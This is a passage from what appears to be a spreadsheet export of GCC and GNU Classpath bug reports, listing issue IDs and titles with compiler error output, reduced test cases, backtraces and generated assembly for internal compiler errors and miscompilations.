which DOES compile!!  It seems that using __attribute__ ((mode(..))) on a typedef inside a struct/class does not work.  Any ideas?
Release:
gcc version 3.4 20030204 (experimental)
Environment:
Redhat 8.0
Reading specs from /esat/quendi/stefaan/install/lib/gcc-lib/i686-pc-linux-gnu/3.4/specs
Configured with: ../../src/gcc/configure --enable-languages=cc++ --prefix=/esat/quendi/stefaan/install
Thread model: posix
gcc version 3.4 20030204 (experimental)
 /esat/quendi/stefaan/install/lib/gcc-lib/i686-pc-linux-gnu/3.4/cc1plus -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=4 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE test16.cpp -D__GNUG__=3 -quiet -dumpbase test16.cpp -msse -auxbase-strip test16.s -O3 -version -o test16.s
GNU C++ version 3.4 20030204 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.2.1.
ignoring nonexistent directory /esat/quendi/stefaan/install/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /esat/quendi/stefaan/install/include/c++/3.4
 /esat/quendi/stefaan/install/include/c++/3.4/i686-pc-linux-gnu
 /esat/quendi/stefaan/install/include/c++/3.4/backward
 /usr/local/include
 /esat/quendi/stefaan/install/include
 /esat/quendi/stefaan/install/lib/gcc-lib/i686-pc-linux-gnu/3.4/include
 /usr/include
End of search list.</t>
  </si>
  <si>
    <t>GCC-2723</t>
  </si>
  <si>
    <t>[HPPA/HPUX] exception handling</t>
  </si>
  <si>
    <t>throwing an axception cause a Memory Fault
happens only on hppa2.0-hp-hpux10.20
Very nasty bug preventing CORBA-related product to work safely...
Release:
gcc version 2.95.3 20010315 (release)
Environment:
hppa2.0-hp-hpux10.20
(using gas 2.10.1)
How-To-Repeat:
class Ex() {
public:
Ex() {}
}
int main(int argc char *argv[]) {
  try {
    throw Ex()
    return 1
  } catch (const Ex&amp; e) {
    return 0
  } catch (...) {
    return 1
  }
  return 1
}
// this will crash in flame</t>
  </si>
  <si>
    <t>jle</t>
  </si>
  <si>
    <t>CLASSPATH-28440</t>
  </si>
  <si>
    <t>gtk radiobutton problem</t>
  </si>
  <si>
    <t>I get the following backtrace when I run the awt Demo and click the Radio Buttons test close it and click it again:
Starting program: /home/andreast/devel/classpath/classpath-install/bin/jamvm gnu.classpath.examples.awt.Demo
Reading symbols from shared object read from target memory...done.
Loaded system supplied DSO at 0x100000
[Thread debugging using libthread_db enabled]
[New Thread 805382912 (LWP 4921)]
[New Thread 950088928 (LWP 4951)]
[New Thread 960574688 (LWP 4952)]
[New Thread 971060448 (LWP 4953)]
[New Thread 981546208 (LWP 4954)]
[New Thread 994788576 (LWP 4955)]
[New Thread 1005540576 (LWP 4956)]
** ERROR **: file /home/andreast/devel/classpath/classpath/native/jni/gtk-peer/gnu_java_awt_peer_gtk_GtkCheckboxPeer.c: line 219 (Java_gnu_java_awt_peer_gtk_GtkCheckboxPeer_createRadioButton): assertion failed: (GTK_IS_RADIO_BUTTON (native_group-&gt;data))
aborting...
java.lang.InternalError
   at gnu.java.awt.peer.gtk.GtkCheckboxPeer.createRadioButton(Native Method)
   at gnu.java.awt.peer.gtk.GtkCheckboxPeer.create(GtkCheckboxPeer.java:115)
   at gnu.java.awt.peer.gtk.GtkComponentPeer.(GtkComponentPeer.java:129)
   at gnu.java.awt.peer.gtk.GtkCheckboxPeer.(GtkCheckboxPeer.java:80)
   at gnu.java.awt.peer.gtk.GtkToolkit.createCheckbox(GtkToolkit.java:450)
   at java.awt.Checkbox.addNotify(Checkbox.java:536)
   at java.awt.Container.addNotifyContainerChildren(Container.java:1977)
   at java.awt.Container.addNotify(Container.java:1237)
   at java.awt.Panel.addNotify(Panel.java:109)
   at java.awt.Container.addNotifyContainerChildren(Container.java:1977)
   at java.awt.Container.addNotify(Container.java:1237)
   at java.awt.Window.addNotify(Window.java:293)
   at java.awt.Frame.addNotify(Frame.java:438)
   at java.awt.Window.show(Window.java:325)
   at java.awt.Component.show(Component.java:1016)
   at java.awt.Component.setVisible(Component.java:947)
   at gnu.classpath.examples.awt.Demo$SubFrame.setVisible(Demo.java:141)
   at gnu.classpath.examples.awt.Demo$MainWindow.actionPerformed(Demo.java:257)
   at java.awt.Button.processActionEvent(Button.java:409)
   at java.awt.Button.processEvent(Button.java:392)
   at java.awt.Button.dispatchEventImpl(Button.java:419)
   at java.awt.Component.dispatchEvent(Component.java:2641)
   at java.awt.EventQueue.dispatchEvent(EventQueue.java:474)
   at java.awt.EventDispatchThread.run(EventDispatchThread.java:95)
Program received signal SIGABRT Aborted.
[Switching to Thread 1005540576 (LWP 4956)]
0x0fe92fcc in raise () from /lib/libc.so.6
(gdb) bt
#0  0x0fe92fcc in raise () from /lib/libc.so.6
#1  0x0fe94b30 in abort () from /lib/libc.so.6
#2  0x0fb9337c in IA__g_logv (log_domain=0x0 log_level=4956
    format=0xfbc76e4 file %s: line %d (%s): assertion failed: (%s)
    args1=0x3bef4c30) at gmessages.c:497
#3  0x44244884 in ?? ()
#4  0x0fb933fc in IA__g_log (log_domain=Variable log_domain is not available.
) at gmessages.c:517
#5  0x0fb934a0 in IA__g_assert_warning (log_domain=0x0
    file=0xf8f5a9c /home/andreast/devel/classpath/classpath/native/jni/gtk-peer/gnu_java_awt_peer_gtk_GtkCheckboxPeer.c line=219
    pretty_function=0xf8f5b54 Java_gnu_java_awt_peer_gtk_GtkCheckboxPeer_createRadioButton expression=0xf8f5b04 GTK_IS_RADIO_BUTTON (native_group-&gt;data))
    at gmessages.c:552
#6  0x0f8d9804 in Java_gnu_java_awt_peer_gtk_GtkCheckboxPeer_createRadioButton
    (env=0x10036154 obj=0x301ecf90 groupPointer=Variable groupPointer is not available.
)
    at /home/andreast/devel/classpath/classpath/native/jni/gtk-peer/gnu_java_awt_peer_gtk_GtkCheckboxPeer.c:219
#7  0x100216e8 in finish () at callNative.S:236
#8  0x100216e8 in finish () at callNative.S:236
Previous frame identical to this frame (corrupt stack?)
I can confirm this on powerpc darwin and mjw confirms it on Debian unstable x86.
Me works on gtk+-2.10 mjw is on gtk+-2.8.18</t>
  </si>
  <si>
    <t>GCC-14166</t>
  </si>
  <si>
    <t>[3.3 Regression] GCC-3.3.3 build fails with internal compiler error</t>
  </si>
  <si>
    <t>Hello. I am getting the following error trying to build a cross compiler for 
arm-elf under CygWin. It seems there is an error in the dp-bit.c file with 
THUMB mode.
 Please tell me if you need more information.
 Regards.
make[1]: Entering directory `/c/gabuild/gcc-build/libiberty'
make[2]: Entering directory `/c/gabuild/gcc-build/libiberty/testsuite'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/c/gabuild/gcc-build/libiberty/testsuite'
make[1]: Leaving directory `/c/gabuild/gcc-build/libiberty'
make[1]: Entering directory `/c/gabuild/gcc-build/gcc'
(cd intl &amp;&amp; make all)
make[2]: Entering directory `/c/gabuild/gcc-build/gcc/intl'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/c/gabuild/gcc-build/gcc/intl'
make GCC_FOR_TARGET=/c/gabuild/gcc-build/gcc/xgcc -B/c/gabuild/gcc-
build/gcc/ -B/c/gnuarm-3.3.3/arm-elf/bin/ -B/c/gnuarm-3.3.3/arm-elf/lib/ -
isystem /c/gnuarm-3.3.3/arm-elf/include \
  BUILD_PREFIX= BUILD_PREFIX_1=loser- \
  AR_FOR_TARGET=arm-elf-ar \
  AR_CREATE_FOR_TARGET=arm-elf-ar  rc \
  AR_FLAGS_FOR_TARGET= \
  CFLAGS=-g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -Wtraditional -pedantic -Wno-long-long  \
  RANLIB_FOR_TARGET=arm-elf-ranlib \
  RANLIB_TEST_FOR_TARGET=[ -f arm-elf-ranlib ] || ( [ i686-pc-cygwin = arm-
unknown-elf ] &amp;&amp; [ -f /usr/bin/ranlib -o -f /bin/ranlib ] ) \
  NM_FOR_TARGET=/c/gnuarm-3.3.3/arm-elf/bin/nm.exe AWK=gawk \
  LIBGCC2_CFLAGS=-O2  -DIN_GCC -DCROSS_COMPILE   -W -Wall -Wwrite-strings -
Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -Dinhibit_libc -
fno-inline -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc \
  INCLUDES=-I. -I. -I../../gcc-3.3.3/gcc -I../../gcc-3.3.3/gcc/. -I../../gcc-
3.3.3/gcc/config -I../../gcc-3.3.3/gcc/../include \
  CONFIG_H=config.h auto-host.h ../../gcc-
3.3.3/gcc/../include/ansidecl.h ../../gcc-3.3.3/gcc/config/i386/xm-
cygwin.h ../../gcc-3.3.3/gcc/config/dbxelf.h ../../gcc-
3.3.3/gcc/config/elfos.h ../../gcc-3.3.3/gcc/config/arm/unknown-
elf.h ../../gcc-3.3.3/gcc/config/arm/elf.h ../../gcc-
3.3.3/gcc/config/arm/aout.h ../../gcc-3.3.3/gcc/config/arm/arm.h ../../gcc-
3.3.3/gcc/defaults.h ../../gcc-3.3.3/gcc/defaults.h insn-constants.h insn-
flags.h MACHMODE_H=machmode.h machmode.def ../../gcc-
3.3.3/gcc/config/arm/arm-modes.def \
  LIB1ASMSRC='arm/lib1funcs.asm' \
  MAKEOVERRIDES= \
  -f libgcc.mk all
make[2]: Entering directory `/c/gabuild/gcc-build/gcc'
for d in libgcc thumb libgcc/thumb be libgcc/be fpu libgcc/fpu interwork 
libgcc/interwork nofmult libgcc/nofmult fpu/interwork libgcc/fpu/interwork 
fpu/nofmult libgcc/fpu/nofmult be/fpu libgcc/be/fpu be/interwork 
libgcc/be/interwork be/nofmult libgcc/be/nofmult be/fpu/interwork 
libgcc/be/fpu/interwork be/fpu/nofmult libgcc/be/fpu/nofmult thumb/be 
libgcc/thumb/be thumb/interwork libgcc/thumb/interwork thumb/be/interwork 
libgcc/thumb/be/interwork do \
  if [ -d $d ] then true else /bin/sh ../../gcc-3.3.3/gcc/mkinstalldirs $d 
fi \
done
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
/c/gabuild/gcc-build/gcc/xgcc -B/c/gabuild/gcc-build/gcc/ -B/c/gnuarm-
3.3.3/arm-elf/bin/ -B/c/gnuarm-3.3.3/arm-elf/lib/ -isystem /c/gnuarm-3.3.3/arm-
elf/include -O2  -DIN_GCC -DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-
prototypes -Wmissing-prototypes -isystem ./include  -Dinhibit_libc -fno-
inline -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -
I../../gcc-3.3.3/gcc -I../../gcc-3.3.3/gcc/. -I../../gcc-3.3.3/gcc/config -
I../../gcc-3.3.3/gcc/../include -DFINE_GRAINED_LIBRARIES -mthumb -DL_pack_df -
c dp-bit.c -o libgcc/thumb/_pack_df.o
dp-bit.c: In function `__pack_d':
dp-bit.c:411: error: insn does not satisfy its constraints:
(insn:HI 333 331 561 0xa12a1b0 (set (reg:HI 3 r3 [109])
        (mem:HI (label_ref 584) [0 S2 A16])) 169 {*thumb_movhi_insn} 
(insn_list:REG_DEP_ANTI 330 (insn_list:REG_DEP_OUTPUT 329 (nil)))
    (expr_list:REG_EQUIV (const_int 2047 [0x7ff])
        (nil)))
dp-bit.c:411: internal compiler error: in extract_constrain_insn_cached at 
recog.c:2090
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [libgcc/thumb/_pack_df.o] Error 1
make[2]: Leaving directory `/c/gabuild/gcc-build/gcc'
make[1]: *** [stmp-multilib] Error 2
make[1]: Leaving directory `/c/gabuild/gcc-build/gcc'
make: *** [all-gcc] Error 2</t>
  </si>
  <si>
    <t>pbk</t>
  </si>
  <si>
    <t>GCC-81477</t>
  </si>
  <si>
    <t>HSA offloading regressions: function cannot be cloned</t>
  </si>
  <si>
    <t>I noticed that with HSA offloading enabled as of r250048 (Avoid global optimize flag checks in LTO) a handful of test cases FAIL for excess errors: c-c++-common/gomp/pr61486-1.c (C C++) c-c++-common/gomp/pr63249.c (C C++) g++.dg/gomp/pr63249.C g++.dg/gomp/pr66571-1.C.
    cc1: warning: could not emit HSAIL for function foo._omp_fn.0: function cannot be cloned [-Whsa]
gcc/ipa-hsa.c:
    /* If NODE is not versionable warn about not emiting HSAIL and return false.
       Otherwise return true.  */
    static bool
    check_warn_node_versionable (cgraph_node *node)
    {
      if (!node-&gt;local.versionable)
        {
          warning_at (EXPR_LOCATION (node-&gt;decl) OPT_Whsa
                      could not emit HSAIL for function %s: function cannot be 
                      cloned node-&gt;name ())
          return false
        }
      return true
    }</t>
  </si>
  <si>
    <t>GCC-66101</t>
  </si>
  <si>
    <t>[5 Regression] internal compiler error: in verify_loop_structure at cfgloop.c:1662</t>
  </si>
  <si>
    <t>$ ./cc1 -quiet -O2 o.c 
o.c: In function â€˜barâ€™:
o.c:8:5: warning: implicit declaration of function â€˜longjmpâ€™ [-Wimplicit-function-declaration]
     longjmp ()
     ^
o.c: In function â€˜fooâ€™:
o.c:16:3: warning: implicit declaration of function â€˜_setjmpâ€™ [-Wimplicit-function-declaration]
   _setjmp ()
   ^
o.c:29:1: error: size of loop 1 should be 3 not 5
 }
 ^
o.c:29:1: internal compiler error: in verify_loop_structure at cfgloop.c:1662
0x8437cc verify_loop_structure()
	/home/marek/src/gcc/gcc/cfgloop.c:1662
0xb9b354 loop_optimizer_init(unsigned int)
	/home/marek/src/gcc/gcc/loop-init.c:124
0xc872fa execute
	/home/marek/src/gcc/gcc/predict.c:3056
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
int a c d e
int
bar ()
{
  int b = *(long *) 7 == 5 ? : 0
  if (a || a &gt; b)
    longjmp ()
  return 1
}
void
foo ()
{
  long f
  _setjmp ()
  for ( d c++)
    switch (c)
      case 0:
      {
	f = bar () &gt;&gt; 1
	if (e)
	  goto L
	if (bar () &gt;&gt; 1)
	  goto L
      }
L:
}</t>
  </si>
  <si>
    <t>GCC-29431</t>
  </si>
  <si>
    <t>Not Implemented: complex character array constructors</t>
  </si>
  <si>
    <t>In fixing PR29373 I separated off the part to do with the function declaration from that triggered by the constructor.
! { dg-do compile }
! Tests patch for PR29373 in which the implicit character
! statement messes up the function declaration because the
! requisite functions in decl.c were told nothing about
! implicit types.
!
! Contributed by Tobias Schlueter  
!
  implicit character*32 (a-z)
  CHARACTER(len=255) DIMENSION(12)  :: a
! Reporters original which triggers another error:
! gfc_todo: Not Implemented: complex character array
! constructors. 
  a = reshape((/ to_string(1.0) /) (/ 1 2 /)) ! uncommented
  a = to_string(1.0)
  print * a
  CONTAINS
    FUNCTION to_string(x)
      character*32 to_string ! moved from function declaration.
      REAL INTENT(in) :: x
      WRITE(to_string FMT=(F6.3)) x
    END FUNCTION
END PROGRAM
does this
[prt@localhost pr29373]# /svn-4.2/bin/gfortran  pr29373a.f90
pr29373a.f90: In function â€˜MAIN__â€™:
pr29373a.f90:24: fatal error: gfc_todo: Not Implemented: complex character array constructors
compilation terminated.
Paul</t>
  </si>
  <si>
    <t>GCC-15135</t>
  </si>
  <si>
    <t>program hangs in call to sqrt when compiled with -O</t>
  </si>
  <si>
    <t>The program below compiles and runs when compiled without any compiler options
but hangs in the call to sqrt when compiled with -O. All simple changes I made
to it make it run through.
The system I'm working on is a dual processor IBM blade with 2Gb of memory
running RedHat enterprise. Please contact me if you need further specs. I
compiled using version 3.2.3 20030502 of gcc 3.4.0 myself with no special
configuration options:
&gt; gcc-3.4.0 -v       
Reading specs from /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/specs
Configured with: ./configure --program-suffix=-3.4.0
Thread model: posix
gcc version 3.4.0
Again g++-3.4.0 -O test.cc ./a.out hangs indefinately while g++-3.4.0
test.cc ./a.out exits.
I changed inclusion of math.h to explicit def of NAN and direct call to
__builtin_sqrt so that temp files would be smaller.
Daniel
test.cc:
# define NAN \
  (__extension__                                                            \
   ((union { unsigned __l __attribute__((__mode__(__SI__))) float __d })  \
    { __l: 0x7fc00000UL }).__d)
inline double fmax(double a double b) {
  if (a &lt; b) return b
  else return a
}
double f() {
  return __builtin_sqrt(NAN/fmax(1. 1./.0))
}
int main() {
  double u = f()
  return 0
}
test.ii:
# 1 test.cc
# 1 
# 1 
# 1 test.cc
inline double fmax(double a double b) {
  if (a &lt; b) return b
  else return a
}
double f() {
  return __builtin_sqrt((__extension__ ((union { unsigned __l
__attribute__((__mode__(__SI__))) float __d }) { __l: 0x7fc00000UL
}).__d)/fmax(1. 1./.0))
}
int main() {
  double u = f()
  return 0
}
test.s:
	.file	test.cc
	.section	.rodata.cst8aM@progbits8
	.align 8
.LC3:
	.long	0
	.long	0
	.text
	.align 2
.globl _Z1fv
	.type	_Z1fv @function
_Z1fv:
.LFB3:
	pushl	%ebp
.LCFI0:
	movl	%esp %ebp
.LCFI1:
	subl	$4 %esp
.LCFI2:
	movl	$2143289344 %eax
	movl	%eax -4(%ebp)
	flds	-4(%ebp)
	fld1
	fld	%st(0)
	fdivl	.LC3
	fucom	%st(1)
	fnstsw	%ax
	sahf
	ja	.L16
	fstp	%st(0)
	jmp	.L15
.L16:
	fstp	%st(1)
	jmp	.L15
.L18:
	fstp	%st(1)
.L15:
	fdivr	%st(1) %st
	fsqrt
	fucom	%st(0)
	fnstsw	%ax
	sahf
	jp	.L17
	je	.L6
	fstp	%st(0)
	jmp	.L14
.L17:
	fstp	%st(0)
.L14:
	fld1
	fld	%st(0)
	fdivl	.LC3
	fucom	%st(1)
	fnstsw	%ax
	sahf
	ja	.L18
	fstp	%st(0)
	jmp	.L15
.L6:
	fstp	%st(1)
	leave
	ret
.LFE3:
	.size	_Z1fv .-_Z1fv
	.align 2
.globl main
	.type	main @function
main:
.LFB4:
	pushl	%ebp
.LCFI3:
	movl	%esp %ebp
.LCFI4:
	subl	$8 %esp
.LCFI5:
	andl	$-16 %esp
	subl	$16 %esp
	call	_Z1fv
	fstp	%st(0)
	movl	$0 %eax
	leave
	ret
.LFE4:
	.size	main .-main
	.section	.note.GNU-stack@progbits
	.ident	GCC: (GNU) 3.4.0</t>
  </si>
  <si>
    <t>dfg</t>
  </si>
  <si>
    <t>GCC-14114</t>
  </si>
  <si>
    <t>[4.0 Regression] [unit-at-a-time] ICE in gen_subprogram_die</t>
  </si>
  <si>
    <t xml:space="preserve">
gcc crashes compiling the C code below if both debugging and optimization
are on:
$ ./cc1 x.c -quiet -g -O2
x.c: In function `a':
x.c:5: internal compiler error: in gen_subprogram_die at dwarf2out.c:10696
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
[sss@karma gcc]
It's tripping over this abort in gen_subprogram_die:
	  /* ??? This can happen if there is a bug in the program for
	     instance if it has duplicate function definitions.  Ideally
	     we should detect this case and ignore it.  For now if we have
	     already reported an error any error at all then assume that
	     we got here because of an input error not a dwarf2 bug.  */
	  if (errorcount)
	    return
	  abort ()
Environment:
System: Linux karma 2.6.1 #10 Tue Feb 10 04:31:35 EST 2004 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f77
How-To-Repeat:
Compile with -g -O2:
---------------------------------------
void a()
{
  void c()
  c()
}
void b()
{
  void c()
}
void c() {}
---------------------------------------</t>
  </si>
  <si>
    <t>GCC-54831</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: in vt_add_function_parameter at var-tracking.c:9412 with -O -fno-split-wide-types -g</t>
  </si>
  <si>
    <t>Created attachment 28368
reduced testcase
Compiler output:
$ gcc -O -fno-split-wide-types -g testcase.C 
testcase.C: In function 'void foo(mptr)':
testcase.C:16:1: internal compiler error: in vt_add_function_parameter at var-tracking.c:9412
 }
 ^
0xd7814a vt_add_function_parameter
        /mnt/svn/gcc-trunk/gcc/var-tracking.c:9412
0xd7825f vt_add_function_parameters
        /mnt/svn/gcc-trunk/gcc/var-tracking.c:9516
0xd78db7 vt_initialize
        /mnt/svn/gcc-trunk/gcc/var-tracking.c:9772
0xd827d6 variable_tracking_main_1
        /mnt/svn/gcc-trunk/gcc/var-tracking.c:10016
0xd827d6 variable_tracking_main()
        /mnt/svn/gcc-trunk/gcc/var-tracking.c:10069
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r192080 - crash
r191586 - crash
4.7 r191640 - OK</t>
  </si>
  <si>
    <t>GCC-18503</t>
  </si>
  <si>
    <t>_mm_move_ss SSE intrinsic causes erroneous</t>
  </si>
  <si>
    <t>Compiling the following function on x86 with options -O -fomit-frame-pointer
-msse -S seems to result in erroneous code.
#include 
__m128 bug(__m128 a __m128 b) {
	__m128 c = _mm_sub_ps(a b)
	return _mm_move_ss(c a)
}
This is what the function in the resulting .s file looke like:
	.file	gccbug.c
	.text
	.align 2
.globl __Z3bugU8__vectorfS_
	.def	__Z3bugU8__vectorfS_	.scl	2	.type	32	.endef
__Z3bugU8__vectorfS_:
	subss	%xmm1 %xmm0
	ret
According to
http://www.intel.com/software/products/compilers/clin/docs/ug_cpp/comm1030.htm
_mm_move_ss passes the upper three values through but the code generated
doesn't even calculate those values. I had expected the code to look more like this:
	movaps	%xmm0 %xmm2
	subps	%xmm1 %xmm0
	movss	%xmm2 %xmm0
Hope that turned out right I'm not experienced with AT&amp;T syntax. Is this a bug
or have I misunderstood something? I get similar results with 3.3.4.
Torgeir</t>
  </si>
  <si>
    <t>torgeihe</t>
  </si>
  <si>
    <t>GCC-50654</t>
  </si>
  <si>
    <t>Many Go tests fail on emutls targets</t>
  </si>
  <si>
    <t>Between 20110930 and 20111006 many Go tests started to FAIL on Solaris 8 and
9/x86 (haven't tried SPARC yet) with Sun as thus they use emutls:
output is:
Undefined			first referenced
 symbol  			    in file
__emutls_v.__go_panic_defer         /var/gcc/regression/trunk/8-gcc/build/i386-pc-solaris2.8/./libgo/.libs/libgo.so
__emutls_v.m                        /var/gcc/regression/trunk/8-gcc/build/i386-pc-solaris2.8/./libgo/.libs/libgo.so
ld: fatal: Symbol referencing errors. No output written to /var/gcc/regression/trunk/8-gcc/build/gcc/testsuite/go/array-1.x
collect2: error: ld returned 1 exit status
FAIL: go.go-torture/execute/array-1.go compilation  -O0 
With gas and native TLS the tests work fine.
  Rainer</t>
  </si>
  <si>
    <t>GCC-5165</t>
  </si>
  <si>
    <t>Loading class fields with a ConstantValue attribute</t>
  </si>
  <si>
    <t>I include a single .class file generated by the Nice compiler.
This bug is link to loading a class field
that has a ConstantValue attribute.
Java runs fine on this class but if compiled with gcj
the generated program throws a NullPointer.
Release:
gcc version 3.0.2 (Debian)
Environment:
Debian GNU/Linux
Gcj is actually from Debian package version 2:3.0.3-1
so this might be a gcj 3.0.3 with a bogus version report
How-To-Repeat:
$ ~/tmp ls niceeee/                                                                          [05:08 20/12/01]
main.nice  package.class  package.nicei
$ ~/tmp rm niceeee/package.nicei                                                             [05:08 20/12/01]
$ ~/tmp ls niceeee                                                                           [05:09 20/12/01]
main.nice  package.class
$ ~/tmp CLASSPATH=. java niceeee.package                                                     [05:09 20/12/01]
$ ~/tmp gcj --main=niceeee.package niceeee/package.class                                     [05:09 20/12/01]
$ ~/tmp ./a.out                                                                              [05:09 20/12/01]
Exception in thread main java.lang.NullPointerException
   at 0x401465c9: _Jv_ThrowSignal (/usr/lib/libgcj.so.2)
   at 0x401465f7: ?? (??:0)
   at 0xbf7ff994: ?? (??:0)
   at 0x08048a84: niceeee::package::main__U24_0__U24___U24_0040_(JArray*) (/home/daniel/tmp/niceeee/package.class:0)
   at 0x08048a59: niceeee::package::main(JArray*) (/home/daniel/tmp/niceeee/package.class:0)
   at 0x4015b487: gnu.gcj.runtime.FirstThread.run() (/usr/lib/libgcj.so.2)
   at 0x4016570b: java.lang.Thread.run_(java.lang.Object) (/usr/lib/libgcj.so.2)
   at 0x40240b18: ?? (??:0)
   at 0x4040900a: GC_start_routine (/usr/lib/libgcjgc.so.1)
   at 0x40422eca: ?? (??:0)
   at 0x405193ca: __clone (/lib/libc.so.6)</t>
  </si>
  <si>
    <t>GCC-30789</t>
  </si>
  <si>
    <t>complex folding inexact</t>
  </si>
  <si>
    <t>The constant folding of arithmetic on complex numbers is inexact and doesn't support any of the C99 special cases and avoiding overflow done in libgcc.
Compile and run the following testcase with -std=c99.
#include 
int printf (const char * ...)
#define C1 (DBL_MAX * 0.5 + DBL_MAX * 0.5i)
#define C2 (DBL_MAX * 0.25 + DBL_MAX * 0.25i)
_Complex double c1 = C1
_Complex double c2 = C2
_Complex double c = C1 / C2
int
main (void)
{
  _Complex double cr = c1 / c2
  printf (%f %f\n%f %f\n __real__ c __imag__ c __real__ cr __imag__ cr)
  return 0
}
It prints:
nan nan
2.000000 0.000000
That is the libgcc code handled the division correctly the folding allowed it to overflow.
It should be reasonably straightforward to fold complex multiplication exactly using MPFR: compute ac and bd with results in double the input precision then compute ac-bd with result in the original input precision (so rounding just once to that precision) and similarly with the imaginary part.  Getting division exact (correctly rounded) may be trickier but doing better than at present should be straightforward (simply by taking advantage of the greater exponent range in MPFR).  The folding code also needs to handle the C99 Annex G special cases like the libgcc code does.</t>
  </si>
  <si>
    <t>GCC-43038</t>
  </si>
  <si>
    <t>DECL_PRESERVE_P or attribute((used)) static globals not completely preserved with -flto</t>
  </si>
  <si>
    <t>The fact that LinkObj is initialized with LinkVar does not seem to be
preserved when using -flto:
extern const char LinkVar
__attribute__((used)) static const char *const LinkObj = LinkVar</t>
  </si>
  <si>
    <t>GCC-28825</t>
  </si>
  <si>
    <t>return (vector float) { a a b b } generates unwanted MMX insns</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #24073 +++
Take the following example:
#define vector __attribute__((vector_size(16)))
float a float b
vector float f(void) { return (vector float){ a b 0.0 0.0} }
---
Currently we get:
        subl    $12 %esp
        movss   _b %xmm0
        movss   _a %xmm1
        unpcklps        %xmm0 %xmm1
        movaps  %xmm1 %xmm0
        xorl    %eax %eax
        xorl    %edx %edx
        movl    %eax (%esp)
        movl    %edx 4(%esp)
        xorps   %xmm1 %xmm1
        movlhps %xmm1 %xmm0
        addl    $12 %esp
------
We should be able to produce:
movss _b %xmm0
movss _a %xmm1
shufps 60 /*[0 3 3 0]*/ %xmm1 %xmm0 // _a 0 0 _b
shufps 201 /*[3 0 2 1]*/ %xmm0 %xmm0 // _a _b 0 0
This is from Nathan Begeman.
================================================================
 ------- Comment #4 From Uros Bizjak  2005-09-27 11:41   -------
I think that following example wins the contest:
vector float f(void) { return (vector float){ a a b b} }
gcc -O2 -msse -fomit-frame-pointer
	subl	$28 %esp
	movss	a %xmm0
	movss	%xmm0 4(%esp)
	movss	b %xmm0
	movd	4(%esp) %mm0
	punpckldq	%mm0 %mm0
	movss	%xmm0 4(%esp)
	movq	%mm0 16(%esp)
	movd	4(%esp) %mm0
	punpckldq	%mm0 %mm0
	movq	%mm0 8(%esp)
	movlps	16(%esp) %xmm1
	movhps	8(%esp) %xmm1
	addl	$28 %esp
	movaps	%xmm1 %xmm0
	ret
Note the usage of MMX registers.
------- Comment #5 From Andrew Pinski 2005-09-27 14:33 -------
(In reply to comment #4)
&gt; I think that following example wins the contest:
&gt; 
&gt; vector float f(void) { return (vector float){ a a b b} }
For this it is a different bug.  The issue with the above is that ix86_expand_vector_init_duplicate check 
for mmx_okay is bad.
Currently we have
      if (!mmx_ok &amp;&amp; !TARGET_SSE)
but I if I change it to:
      if (!mmx_ok)
we get:
        movss   _a %xmm0
        movss   _b %xmm1
        unpcklps        %xmm0 %xmm0
        unpcklps        %xmm1 %xmm1
        movlhps %xmm1 %xmm0
Which looks ok to me.  That testcase should be opened into another bug as it is obviously wrong.
=====================================================================
Cloned from 24073 to track the MMX insn issue the original 24073 problem is a performance issue.</t>
  </si>
  <si>
    <t>GCC-46526</t>
  </si>
  <si>
    <t>[4.6 Regression] VTable Problem?</t>
  </si>
  <si>
    <t>Created attachment 22435
Preprocessed output
Both asserts should pass but one fails.
Command: g++-mp-4.6 -std=c++0x -v -g3 -save-temps -Wall expose_bug.cpp -o expose_bug
Command output:
Using built-in specs.
COLLECT_GCC=g++-mp-4.6
COLLECT_LTO_WRAPPER=/opt/local/libexec/gcc/x86_64-apple-darwin10/4.6.0/lto-wrapper
Target: x86_64-apple-darwin10
Configured with: ../gcc-4.6-20101113/configure --prefix=/opt/local --build=x86_64-apple-darwin10 --enable-languages=cc++objcobj-c++ --libdir=/opt/local/lib/gcc46 --includedir=/opt/local/include/gcc46 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --datarootdir=/opt/local/share/gcc-4.6 --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.6 --with-gxx-include-dir=/opt/local/include/gcc46/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --enable-stage1-checking --disable-multilib --enable-fully-dynamic-string
Thread model: posix
gcc version 4.6.0 20101113 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.6.5' '-std=c++0x' '-v' '-g3' '-save-temps' '-Wall' '-o' 'expose_bug' '-shared-libgcc' '-mtune=generic'
 /opt/local/libexec/gcc/x86_64-apple-darwin10/4.6.0/cc1plus -E -quiet -v -dD -D__DYNAMIC__ expose_bug.cpp -fPIC -mmacosx-version-min=10.6.5 -mtune=generic -std=c++0x -Wall -g3 -fworking-directory -fpch-preprocess -o expose_bug.ii
ignoring nonexistent directory /opt/local/lib/gcc46/gcc/x86_64-apple-darwin10/4.6.0/../../../../../x86_64-apple-darwin10/include
#include ... search starts here:
#include  search starts here:
 /opt/local/include/gcc46/c++/
